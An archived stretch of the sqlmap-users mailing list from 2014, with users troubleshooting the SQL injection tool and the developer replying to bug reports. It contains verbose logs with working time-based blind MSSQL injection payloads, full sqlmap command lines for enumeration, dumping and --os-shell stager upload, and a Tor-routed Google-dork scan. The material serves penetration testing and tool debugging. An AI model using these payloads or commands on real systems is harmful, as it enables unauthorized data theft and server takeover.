>     [14:53:26] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>     master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
>     NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
>     WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>101)
>     WAITFOR DELAY '0:0:10'; --
>     [14:54:56] [INFO] retrieved:
>     [14:54:56] [DEBUG] performed 5 queries in 183.70 seconds
>     [...]
>     [14:57:27] [INFO] retrieved:
>     [14:57:27] [DEBUG] performed 5 queries in 150.30 seconds
>     [...]
>     [14:59:57] [INFO] retrieved:
>     [14:59:57] [DEBUG] performed 5 queries in 150.26 seconds
>     [14:59:57] [WARNING] unable to retrieve the number of tables for
>     database 'DB_NAME'
>     [14:59:57] [CRITICAL] unable to retrieve the tables for any database
> 
>     Any suggestions? Using higher --time-sec, --hex or --no-cast didn't
>     help. Using --start and --stop also didn't work. I can't get any data
>     out of it like this.
> 
>     Best regards,
>     floyd
> 
>     ------------------------------------------------------------------------------
>     Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
>     Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS Reports
>     Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
>     Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
>     http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
>     _______________________________________________
>     sqlmap-users mailing list
>     sql...@li...
>     <mailto:sql...@li...>
>     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

Re: [sqlmap-users] number of databases/tables problems

From: Miroslav S. <mir...@gm...> - 2014-09-24 11:04:05

Hi.

This looks like a permission problem while reading system tables. That
would explain why DB_NAME() works and everything else fails.

Bye
On Sep 23, 2014 4:27 PM, "floyd" <flo...@ya...> wrote:

> Hi everybody
>
> I'm doing a Pentest and I'm able to do a time based blind sql injection
> on a very big database.
>
> It takes some time, but that's fine for now. But sqlmap is failing when
> it comes to retrieving the *number of [databases, tables, columns,
> whatever]*:
>
> $ /opt/sqlmap-dev/sqlmap.py -r http_req1_v2.txt -p "redactedParameter"
> --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)
> Gecko/20100101 Firefox/32.0" --level=5 --risk=3 --dbms=MSSQL
> --os=Windows --suffix="; --" --prefix="';" --technique=T -v 3
> --time-sec=2 --proxy socks5://localhost:5050 --dbs -o
> [...snip...]
> [11:57:49] [INFO] confirming Microsoft SQL Server
> [11:57:49] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows
> web application technology: ASP.NET, ASP.NET 2.X.XXXXX (redacted)
> back-end DBMS: Microsoft SQL Server 2008
> [11:57:49] [INFO] fetching database names
> [11:57:49] [INFO] fetching number of databases
> [11:57:49] [WARNING] multi-threading is considered unsafe in time-based
> data retrieval. Going to switch it off automatically
> [11:57:49] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> master..sysdatabases),1,1))>51) WAITFOR DELAY '0:0:2'; --
> [11:57:49] [WARNING] time-based comparison requires larger statistical
> model, please wait..............................
> [11:58:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> master..sysdatabases),1,1))>54) WAITFOR DELAY '0:0:2'; --
> [11:58:25] [WARNING] it is very important not to stress the network
> adapter during usage of time-based payloads to prevent potential errors
> [11:58:55] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> master..sysdatabases),1,1))>56) WAITFOR DELAY '0:0:2'; --
> [11:59:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> master..sysdatabases),1,1))>57) WAITFOR DELAY '0:0:2'; --
> [11:59:55] [INFO] retrieved:
> [11:59:55] [DEBUG] performed 4 queries in 126.19 seconds
> [11:59:55] [WARNING] in case of continuous data retrieval problems you
> are advised to try a switch '--no-cast' or switch '--hex'
> [11:59:55] [ERROR] unable to retrieve the number of databases
>
> However, for the *database names* sqlmap will continue with the
> DB_NAME(X) technique. Right now it is dumping out all the different
> database names, which works fine:
>
> [15:08:34] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> ISNULL(CAST(DB_NAME(110) AS NVARCHAR(4000)),CHAR(32))),16,1))!=109)
> WAITFOR DELAY '0:0:2'; --
>
> Because I got many of the following errors (and the occurence of the
> error is random), I patched the time delay in the python code to be
> fixed to 2 seconds (maybe you want to have an option for that):
>
> [15:03:14] [ERROR] invalid character detected. retrying..
> [15:03:14] [WARNING] increasing time delay to 3 seconds
>
> That works fine and I get good results. However, when I try to dump
> table names now (from one of the known databases) with the -D DB_NAME
> and --tables switch, it is again failing to retrieve the number of tables:
>
> [14:51:53] [INFO] fetching tables for database: DB_NAME
> [14:51:53] [INFO] fetching number of tables for database 'DB_NAME'
> [14:51:53] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
> NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
> WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>66)
> WAITFOR DELAY '0:0:10'; --
> [14:51:53] [WARNING] time-based comparison requires larger statistical
> model, please wait..............................
> [14:52:26] [CRITICAL] considerable lagging has been detected in
> connection response(s). Please use as high value for option '--time-sec'
> as possible (e.g. 10 or more)
> [14:52:56] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
> NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
> WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>97)
> WAITFOR DELAY '0:0:10'; --
> [14:52:56] [WARNING] it is very important not to stress the network
> adapter during usage of time-based payloads to prevent potential errors
> [14:53:26] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
> NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
> WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>101)
> WAITFOR DELAY '0:0:10'; --
> [14:54:56] [INFO] retrieved:
> [14:54:56] [DEBUG] performed 5 queries in 183.70 seconds
> [...]
> [14:57:27] [INFO] retrieved:
> [14:57:27] [DEBUG] performed 5 queries in 150.30 seconds
> [...]
> [14:59:57] [INFO] retrieved:
> [14:59:57] [DEBUG] performed 5 queries in 150.26 seconds
> [14:59:57] [WARNING] unable to retrieve the number of tables for
> database 'DB_NAME'
> [14:59:57] [CRITICAL] unable to retrieve the tables for any database
>
> Any suggestions? Using higher --time-sec, --hex or --no-cast didn't
> help. Using --start and --stop also didn't work. I can't get any data
> out of it like this.
>
> Best regards,
> floyd
>
>
> ------------------------------------------------------------------------------
> Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
> Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS Reports
> Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
> Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
>
> http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

[sqlmap-users] number of databases/tables problems

From: floyd <flo...@ya...> - 2014-09-23 14:26:53

Hi everybody

I'm doing a Pentest and I'm able to do a time based blind sql injection
on a very big database.

It takes some time, but that's fine for now. But sqlmap is failing when
it comes to retrieving the *number of [databases, tables, columns,
whatever]*:

$ /opt/sqlmap-dev/sqlmap.py -r http_req1_v2.txt -p "redactedParameter"
--user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)
Gecko/20100101 Firefox/32.0" --level=5 --risk=3 --dbms=MSSQL
--os=Windows --suffix="; --" --prefix="';" --technique=T -v 3
--time-sec=2 --proxy socks5://localhost:5050 --dbs -o
[...snip...]
[11:57:49] [INFO] confirming Microsoft SQL Server
[11:57:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.X.XXXXX (redacted)
back-end DBMS: Microsoft SQL Server 2008
[11:57:49] [INFO] fetching database names
[11:57:49] [INFO] fetching number of databases
[11:57:49] [WARNING] multi-threading is considered unsafe in time-based
data retrieval. Going to switch it off automatically
[11:57:49] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
master..sysdatabases),1,1))>51) WAITFOR DELAY '0:0:2'; --
[11:57:49] [WARNING] time-based comparison requires larger statistical
model, please wait..............................
[11:58:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
master..sysdatabases),1,1))>54) WAITFOR DELAY '0:0:2'; --
[11:58:25] [WARNING] it is very important not to stress the network
adapter during usage of time-based payloads to prevent potential errors
[11:58:55] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
master..sysdatabases),1,1))>56) WAITFOR DELAY '0:0:2'; --
[11:59:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
master..sysdatabases),1,1))>57) WAITFOR DELAY '0:0:2'; --
[11:59:55] [INFO] retrieved:
[11:59:55] [DEBUG] performed 4 queries in 126.19 seconds
[11:59:55] [WARNING] in case of continuous data retrieval problems you
are advised to try a switch '--no-cast' or switch '--hex'
[11:59:55] [ERROR] unable to retrieve the number of databases

However, for the *database names* sqlmap will continue with the
DB_NAME(X) technique. Right now it is dumping out all the different
database names, which works fine:

[15:08:34] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
ISNULL(CAST(DB_NAME(110) AS NVARCHAR(4000)),CHAR(32))),16,1))!=109)
WAITFOR DELAY '0:0:2'; --

Because I got many of the following errors (and the occurence of the
error is random), I patched the time delay in the python code to be
fixed to 2 seconds (maybe you want to have an option for that):

[15:03:14] [ERROR] invalid character detected. retrying..
[15:03:14] [WARNING] increasing time delay to 3 seconds

That works fine and I get good results. However, when I try to dump
table names now (from one of the known databases) with the -D DB_NAME
and --tables switch, it is again failing to retrieve the number of tables:

[14:51:53] [INFO] fetching tables for database: DB_NAME
[14:51:53] [INFO] fetching number of tables for database 'DB_NAME'
[14:51:53] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>66)
WAITFOR DELAY '0:0:10'; --
[14:51:53] [WARNING] time-based comparison requires larger statistical
model, please wait..............................
[14:52:26] [CRITICAL] considerable lagging has been detected in
connection response(s). Please use as high value for option '--time-sec'
as possible (e.g. 10 or more)
[14:52:56] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>97)
WAITFOR DELAY '0:0:10'; --
[14:52:56] [WARNING] it is very important not to stress the network
adapter during usage of time-based payloads to prevent potential errors
[14:53:26] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>101)
WAITFOR DELAY '0:0:10'; --
[14:54:56] [INFO] retrieved:
[14:54:56] [DEBUG] performed 5 queries in 183.70 seconds
[...]
[14:57:27] [INFO] retrieved:
[14:57:27] [DEBUG] performed 5 queries in 150.30 seconds
[...]
[14:59:57] [INFO] retrieved:
[14:59:57] [DEBUG] performed 5 queries in 150.26 seconds
[14:59:57] [WARNING] unable to retrieve the number of tables for
database 'DB_NAME'
[14:59:57] [CRITICAL] unable to retrieve the tables for any database

Any suggestions? Using higher --time-sec, --hex or --no-cast didn't
help. Using --start and --stop also didn't work. I can't get any data
out of it like this.

Best regards,
floyd

Re: [sqlmap-users] sqlmap bug

From: bockor <bo...@ya...> - 2014-09-17 11:09:44

Thanks!

17.09.2014, 12:19, "Miroslav Stampar" <mir...@gm...>:
> Fixed with https://github.com/sqlmapproject/sqlmap/commit/ffa7e2f6e905a5bd0aeab98b51f512529e5024e0#diff-ee248665d16721810ef658a78e5d83a2
>
> On Sun, Sep 14, 2014 at 7:29 PM, bockor <bo...@ya...> wrote:
>> sqlmap version: 1.0-dev
>> Python version: 2.7.6
>> Operating system: posix
>> Command line: ./sqlmap.py --beep --page-rank --batch --tor --threads=5 --random-agent -g ********************
>> Technique: None
>> Back-end DBMS: None (identified)
>> Traceback (most recent call last):
>>   File "./sqlmap.py", line 95, in main
>>     start()
>>   File "/home/bockor/sqlmap/lib/controller/controller.py", line 311, in start
>>     message = "URL %d:\n%s %s%s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")
>>   File "/home/bockor/sqlmap/thirdparty/pagerank/pagerank.py", line 18, in get_pagerank
>>     _ = 'http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=%s&q=info:%s' % (check_hash(hash_url(url)), urllib.quote(url))
>>   File "/usr/lib/python2.7/urllib.py", line 1288, in quote
>>     return ''.join(map(quoter, s))
>> KeyError: u'\xc3'
>>
>> ------------------------------------------------------------------------------
>> Want excitement?
>> Manually upgrade your production database.
>> When you want reliability, choose Perforce
>> Perforce version control. Predictably reliable.
>> http://pubads.g.doubleclick.net/gampad/clk?id=157508191&iu=/4140/ostg.clktrk
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
> --
> Miroslav Stampar
> http://about.me/stamparm

Re: [sqlmap-users] SQLMap bug

From: Miroslav S. <mir...@gm...> - 2014-09-17 08:30:28

Hi Nedko.

Thank you for your report. It should be fixed now.

Bye

On Wed, Sep 17, 2014 at 9:09 AM, Nedko Hristov <ne...@st...> wrote:

> Hi guys. I try to run SQL Map against company's script that I'm testing
> and I got next error message with the uname -a and errors on exit:
>
>
> root@nedko:/var/www/sqlmap# python sqlmap.py --sqlmap-shell
> sqlmap-shell> -u
> "
> http://192.168.0.50/blog/install/index.php?controller=pjLoad&action=pjActionView&id=2
> "
> --technique=BEU --banner --batch
>
> [10:05:59] [CRITICAL] unhandled exception in
> sqlmap/1.0-dev-nongit-20140917, retry your run with the latest
> development version from the GitHub repository. If the exception
> persists, please send by e-mail to 'sql...@li...'
> or open a new issue at
> 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers
> will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev
> Python version: 2.7.6
> Operating system: posix
> Command line: sqlmap.py --sqlmap-shell
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
>    File "sqlmap.py", line 72, in main
>      cmdLineOptions.update(cmdLineParser().__dict__)
>    File "/var/www/sqlmap/lib/parse/cmdline.py", line 829, in cmdLineParser
>      saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
>    File "/var/www/sqlmap/lib/core/shell.py", line 52, in saveHistory
>      readline.write_history_file(historyPath)
> IOError: [Errno 2] No such file or directory
>
>
>
>
> If you need more steps to reproduce feel free to write me here.
>
>
> Regards,
> Nedko Hrsitov
> SQA @ StivaSoft.com
>
>
> ------------------------------------------------------------------------------
> Want excitement?
> Manually upgrade your production database.
> When you want reliability, choose Perforce
> Perforce version control. Predictably reliable.
>
> http://pubads.g.doubleclick.net/gampad/clk?id=157508191&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] sqlmap bug

From: Miroslav S. <mir...@gm...> - 2014-09-17 08:19:46

Fixed with
https://github.com/sqlmapproject/sqlmap/commit/ffa7e2f6e905a5bd0aeab98b51f512529e5024e0#diff-ee248665d16721810ef658a78e5d83a2

On Sun, Sep 14, 2014 at 7:29 PM, bockor <bo...@ya...> wrote:

> sqlmap version: 1.0-dev
> Python version: 2.7.6
> Operating system: posix
> Command line: ./sqlmap.py --beep --page-rank --batch --tor --threads=5
> --random-agent -g ********************
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 95, in main
>     start()
>   File "/home/bockor/sqlmap/lib/controller/controller.py", line 311, in
> start
>     message = "URL %d:\n%s %s%s" % (hostCount, conf.method or
> HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if
> conf.googleDork and conf.pageRank else "")
>   File "/home/bockor/sqlmap/thirdparty/pagerank/pagerank.py", line 18, in
> get_pagerank
>     _ = '
> http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=%s&q=info:%s'
> % (check_hash(hash_url(url)), urllib.quote(url))
>   File "/usr/lib/python2.7/urllib.py", line 1288, in quote
>     return ''.join(map(quoter, s))
> KeyError: u'\xc3'
>
>
>
> ------------------------------------------------------------------------------
> Want excitement?
> Manually upgrade your production database.
> When you want reliability, choose Perforce
> Perforce version control. Predictably reliable.
>
> http://pubads.g.doubleclick.net/gampad/clk?id=157508191&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] SQLMap bug

From: Nedko H. <ne...@st...> - 2014-09-17 08:16:27

Hi guys. I try to run SQL Map against company's script that I'm testing 
and I got next error message with the uname -a and errors on exit:


root@nedko:/var/www/sqlmap# python sqlmap.py --sqlmap-shell
sqlmap-shell> -u 
"http://192.168.0.50/blog/install/index.php?controller=pjLoad&action=pjActionView&id=2" 
--technique=BEU --banner --batch

[10:05:59] [CRITICAL] unhandled exception in 
sqlmap/1.0-dev-nongit-20140917, retry your run with the latest 
development version from the GitHub repository. If the exception 
persists, please send by e-mail to 'sql...@li...' 
or open a new issue at 
'https://github.com/sqlmapproject/sqlmap/issues/new' with the following 
text and any information required to reproduce the bug. The developers 
will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev
Python version: 2.7.6
Operating system: posix
Command line: sqlmap.py --sqlmap-shell
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
   File "sqlmap.py", line 72, in main
     cmdLineOptions.update(cmdLineParser().__dict__)
   File "/var/www/sqlmap/lib/parse/cmdline.py", line 829, in cmdLineParser
     saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
   File "/var/www/sqlmap/lib/core/shell.py", line 52, in saveHistory
     readline.write_history_file(historyPath)
IOError: [Errno 2] No such file or directory




If you need more steps to reproduce feel free to write me here.


Regards,
Nedko Hrsitov
SQA @ StivaSoft.com

[sqlmap-users] sqlmap bug

From: bockor <bo...@ya...> - 2014-09-14 17:42:28

<div>sqlmap version: 1.0-dev<br />Python version: 2.7.6<br />Operating system: posix<br />Command line: ./sqlmap.py --beep --page-rank --batch --tor --threads=5 --random-agent -g ********************<br />Technique: None<br />Back-end DBMS: None (identified)<br />Traceback (most recent call last):<br />  File "./sqlmap.py", line 95, in main<br />    start()<br />  File "/home/bockor/sqlmap/lib/controller/controller.py", line 311, in start<br />    message = "URL %d:\n%s %s%s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")<br />  File "/home/bockor/sqlmap/thirdparty/pagerank/pagerank.py", line 18, in get_pagerank<br />    _ = 'http://toolbarqueries.google.com/tbr?client=navclient-auto&amp;features=Rank&amp;ch=%s&amp;q=info:%s' % (check_hash(hash_url(url)), urllib.quote(url))<br />  File "/usr/lib/python2.7/urllib.py", line 1288, in quote<br />    return ''.join(map(quoter, s))<br />KeyError: u'\xc3'<br /><br /></div>

Re: [sqlmap-users] Little tip in predict outoup.

From: Rodrigo Z. S. <rod...@gm...> - 2014-09-07 22:38:11

wow... More I read the manual, more I see I can't do it. The best option
until now was use a TRUE and FALSE case. The predict-output ISN'T what I
thought it was.

Hum... What I want to do is just
-> Do a great sql code and download a html page
-> Run a function: u_char translate_page("html_page").
->use the number, from 0 to 255 to continue doing any hack because this is
the translated value.

I just want to write this function and use all good things from the
program. Although I can append some code in sql, I need to use the
downloaded page.

Any tip?

2014-09-07 16:34 GMT-03:00 Rodrigo Zanatta Silva <
rod...@gm...>:

> Hi friends.
>
> I found a sqlinject in one page before even know this great tool. This
> work in a simple way:
>
> I can get any character from the table, than I convert to number and it
> download a bank page. (I don't know how translate it to english). Anyway,
> this page have a unique number. So, I list all 1 to 255 unique number. If
> my sql download one page, I just compare the number and get the value. With
> it, I can get anything (even files).
>
> But, the sqlmap have a good and very tested way to dump the database. My
> was a crap. So, how can I translate this to the program? Although it CAN
> download the database, I can make it more fast. The program get some
> letters and test with great than a number. I can speed up because every
> download WILL return one value.
>
> But, the ironic is that I will need use only one thread. Lol, this is
> useless. What is my options :D
>
> Just to be clean, I do a sql command, it return, like, id=78, and download
> one page (I cant get the URL of returned page). After I download it (40kb),
> I do a small python command to parse the number (just get a text between
> two text), than just compare in a case and get the value.
>
> Any tip?
>

[sqlmap-users] Little tip in predict outoup.

From: Rodrigo Z. S. <rod...@gm...> - 2014-09-07 19:34:58

Hi friends.

I found a sqlinject in one page before even know this great tool. This work
in a simple way:

I can get any character from the table, than I convert to number and it
download a bank page. (I don't know how translate it to english). Anyway,
this page have a unique number. So, I list all 1 to 255 unique number. If
my sql download one page, I just compare the number and get the value. With
it, I can get anything (even files).

But, the sqlmap have a good and very tested way to dump the database. My
was a crap. So, how can I translate this to the program? Although it CAN
download the database, I can make it more fast. The program get some
letters and test with great than a number. I can speed up because every
download WILL return one value.

But, the ironic is that I will need use only one thread. Lol, this is
useless. What is my options :D

Just to be clean, I do a sql command, it return, like, id=78, and download
one page (I cant get the URL of returned page). After I download it (40kb),
I do a small python command to parse the number (just get a text between
two text), than just compare in a case and get the value.

Any tip?

Re: [sqlmap-users] Why do i get multiple entries for Unique-IDs while dumping?

From: Miroslav S. <mir...@gm...> - 2014-08-26 20:09:56

Hi.

This looks strange, especially when considering used options/switches and
the SQL type.

Do you see "duplications" in console output while dumping entries? Do you
get this kind of behavior in non-SQLITE format(s) too? Have you noticed
duplicate error messages in vulnerable web application?

Kind regards,
Miroslav Stampar


On Mon, Aug 25, 2014 at 11:07 AM, Michael Bachmann <mba...@gm...>
wrote:

> Hi
>
> I try to dump a db. my command is as follows:
>
> sqlmap.py -c sqlmap.conf -D TheDb -T TheTable --dump --pivot-column=ID -X
> SomeNotNeededColumns -o --dump-format SQLITE
>
> injection method is:
>
> Type: error-based
> Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
>
> if i do a count on this table i get:
>
> about 40k entries
>
> but when i check the dumped sqlite-db i got about 40k entries, but every
> id is present at least 3 times. so if i do a distinct on id, i get about
> 10k entries. why is this?
>
> sometimes the target throws the db-error "user can't login", i guess cause
> of to high usage (probably a shared solution). is this causing this
> behavior?
>
> Kind regards
> Michael
>
>
>
>
>
>
> ------------------------------------------------------------------------------
> Slashdot TV.
> Video for Nerds.  Stuff that matters.
> http://tv.slashdot.org/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] Why do i get multiple entries for Unique-IDs while dumping?

From: Michael B. <mba...@gm...> - 2014-08-25 09:07:16

Hi

I try to dump a db. my command is as follows:

sqlmap.py -c sqlmap.conf -D TheDb -T TheTable --dump --pivot-column=ID -X
SomeNotNeededColumns -o --dump-format SQLITE

injection method is:

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

if i do a count on this table i get:

about 40k entries

but when i check the dumped sqlite-db i got about 40k entries, but every id
is present at least 3 times. so if i do a distinct on id, i get about 10k
entries. why is this?

sometimes the target throws the db-error "user can't login", i guess cause
of to high usage (probably a shared solution). is this causing this
behavior?

Kind regards
Michael

Re: [sqlmap-users] SQLMAP throws 404 error - unable to upload the file stager

From: Robin W. <ro...@di...> - 2014-08-18 06:54:06

I'd assume on LAMP that the file is written using INTO OUTFILE so what you
could try is SSH to the box, use the MySQL client to connect as the user
the web app uses and try to create the file manually just to see if it can
be created.

Robin
On 18 Aug 2014 00:54, "Omara" <col...@ho...> wrote:

> I also get "it looks like the file has not been written, this can occur if
> the DBMS process' user has no write privileges in the destination path"
> when
> I try to read and write a file to the destination path on the DBMS. So the
> question now is, how to make the destination path
> /var/www/dvwa/hackable/uploads writable?. The whole path has root
> permissions set, except the uploads folder has nobody permission set. I
> appreciate you help.
>
>
>
>
> ------------------------------------------------------------------------------
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

Re: [sqlmap-users] SQLMAP throws 404 error - unable to upload the file stager

From: Omara <col...@ho...> - 2014-08-17 23:54:28

I also get "it looks like the file has not been written, this can occur if 
the DBMS process' user has no write privileges in the destination path" when 
I try to read and write a file to the destination path on the DBMS. So the 
question now is, how to make the destination path 
/var/www/dvwa/hackable/uploads writable?. The whole path has root 
permissions set, except the uploads folder has nobody permission set. I 
appreciate you help.

Re: [sqlmap-users] SQLMAP throws 404 error - unable to upload the file stager

From: Omara <col...@ho...> - 2014-08-17 22:56:27

Brandon Perry <bperry.volatile@...> writes:

> 
> 
> Can you write to /tmp?
> 
> Pick a directory you KNOW you should be able to write to, and ensure you 
can write to that first.
> 
> Also, maybe SELinux/AppArmor are getting in the way.
> 
> 
> On Fri, Aug 15, 2014 at 9:52 AM, Omara <coldhand-
Pkb...@pu...> wrote:
> Brandon Perry <bperry.volatile <at> ...> writes:
> >
> >
> > Can you write to /tmp?
> > Instead of chowning the directory, just chmod -R 777 the dir you want to
> write the payload to, that's how many docs on the internet tell people to
> make an upload directory, for instance, writable by the web server.
> >
> > Of course, this is incorrect, but it's definitely easier than figuring
> out what your permissions really should be.
> >
> >
> > On Thu, Aug 14, 2014 at 10:34 PM, M Omara <coldhand-
Pkb...@pu...> wrote:> 
Brandon Perry <bperry.volatile <at> ...> writes:
> > >
> > >
> > > Does the mysql user have write permissions on the web server?  A
> properly
> > configured web server where chown www-data:www-data was done, as opposed
> to
> > chmod 777 on the web dir, which is an improper configuration, will not
> allow
> > the mysql user to write to the web root.
> > You are right, the /var/www has www-data:www-data set. So I created a
> temp
> > folder inside the web root with nobody:nogroup permission but I am still
> > getting the same error. Any more configurations I need to change in
> mysql db
> > for this to work. Thank you in advance.
> >
> > ------------------------------------------------------------------------
-
> -----
> > _______________________________________________
> > sqlmap-users mailing listsqlmap-users-
> 5NWGOfrQmnc-
XMD5yJDbdMReXY1tMh2IBpG/4tX0xfm6C0JFWXbtX6LTB0XVy/Qj...@pu...://li
sts.sourceforge.net/list
> s/listinfo/sqlmap-users
> I should be able to write to /var/www/WackoPicko/temp but I still get the
> same 404 error. I also give chmod 777 -R to /var/www/WackoPicko/users with
> no avail. Do I need to use different switches to be able to write to the
> web root?. I added the --file-dest write switch but still not working. The
> man page says --os-shell works only with writable web root directory and I
> created one but it doesn't work. However, I can get SQL shell on the
> database.
> sqlmap -u "http://x.x.x.x/WackoPicko/users/login.php"--data 
"username=hacker&password=password&submit=login" --os-shell -v 1
> --flush-session --file-dest=http://x.x.x.x/WackoPicko/users
> 
> --------------------------------------------------------------------------
----
> _______________________________________________
> sqlmap-users mailing listsqlmap-users-
5NW...@pu...https://lists.sourceforge.net/lists
/listinfo/sqlmap-users


I tried the same sqlmap command with different switches on DVWA and it 
worked. It's ubuntu-based lampp web server with an "uploads" folder in its 
root with nobody permissions. But I still can't get to upload the stager 
file to OWASPBWA. I disabled apparmor as you recommended and the tmp folder 
is writable but it made no difference. I still get 404 not found.

Re: [sqlmap-users] Resume logic for table content dump

From: Brandon P. <bpe...@gm...> - 2014-08-17 14:39:05

I have had this happen when an ORDER BY is usable, and the results of the
ORDER BY differed from one injection to the next over a period of a few
days.


